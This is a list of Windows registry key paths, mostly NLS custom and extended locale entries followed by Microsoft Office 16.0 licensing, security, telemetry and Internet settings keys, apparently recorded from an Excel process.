HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-JE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-JE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-UM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-UM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-WS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-WS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eo-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eo-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ewo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ewo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ewo-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ewo-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-NC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-NC
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\PowerPoint\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\PixelsPerInch
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Draw
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\SkipCorruptedDrawingDataOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\QFE_FlipPictures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\DeferredCheckDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\Software\Policies\Microsoft\Security
HKEY_CURRENT_USER\Software\Microsoft\Security
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\Volatile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Volatile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\TimeOfFailure
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\DESKTOP-SEV4QOO
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Registration\DESKTOP-SEV4QOO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\DESKTOP-SEV4QOO\ProPlusRetail.AttemptGetKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\NextUserLicensingLicensedUserIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RemoveOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\TestFeatureMapping
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EligibleForExtendedGrace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\FirstCleanValidation
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableFontLinking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\MaxTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\PurgeInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesFetchEndpoint
HKEY_CURRENT_USER\Software\Classes\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}
